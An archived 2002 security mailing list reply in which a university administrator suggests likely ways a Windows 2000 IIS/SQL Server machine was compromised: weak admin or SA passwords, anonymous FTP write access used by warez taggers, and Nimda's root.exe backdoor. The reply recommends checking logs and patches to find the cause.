There are several things I would look at on this computer. Was there an admin password set on the computer? There has been a long discussion on the Unisog mailing list about Univs getting hit by hackers walking right through the front door on 2k/XP machines. If the admin password was easy or NULL, this would be my first guess. The second thing I would look for is to make sure that the IIS ftp server was not set to allow anonymous users a chance to write to the hard drive. We have had a slew of 0-day ftp servers show up with similar tagging methods. The tagging file/directories are used by automated processes that are seeing if they can write a file to the computer before they try to push their Warez/Porn/Junk on your computer and announcing it to their buddies to download. The third thing I would wonder is if you have a root.exe available under the inetpub directory for the web server. If you have nimda droppings on your computer, chances are that you were exposed to Nimda and hackers are using the root.exe to execute arbitrary commands on your system. This could come down through the IIS server, email, open file shares, and other possible attack vectors if it was just nimda. The last one I would check Has the SA account on SQL server had a password set? Has it been patched? There are intrusions that are occuring due to SQL statements that can be mangled in such a way that arbitrary commands can be executed. Have you looked through the logs of the IIS servers you are using to see what evidence may be still there? Are you sure that you have patched all of the computer (IIS, SQL, Win2k past the SP2 patches)? There is very limited information that you have mentioned in the below email, so I can only guess on likely possibilities from my experience on a Univ campus. Maybe the above possibilities can help you determine which of the attack methods might be possible. Look through the IIS logs and see if there is anything in there that makes you suspect one of the above over the others. If you would like me to send you the references to each of the above from various mailing lists and web sites, I would be willing to sit down later tonight and look them up for you. Scott On Fri, 17 May 2002, John Jasen wrote: > > Got a wierd one here. > > Win2k server, SP2 > IIS 5.0 > SQL server 7 > ipswitch imail 6.x > > Its definitely been broken into. PC-cillian bas picked up a few nimda > files, and there is a directory c:\tAGGEd with various subdirectories > under it, and an unopenable file C:\TaGGed By Ca$e. > > I'm working on getting a disk image up for perusal, but that might take a > few days. > > Anybody seen this yet? Searching securityfocus, McAfee, Google, and a few > other places has come up dry. > > -- > -- John E. Jasen (jjasen1at_private) > -- User Error #2361: Please insert coffee and try again. > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon May 20 2002 - 19:01:15 PDT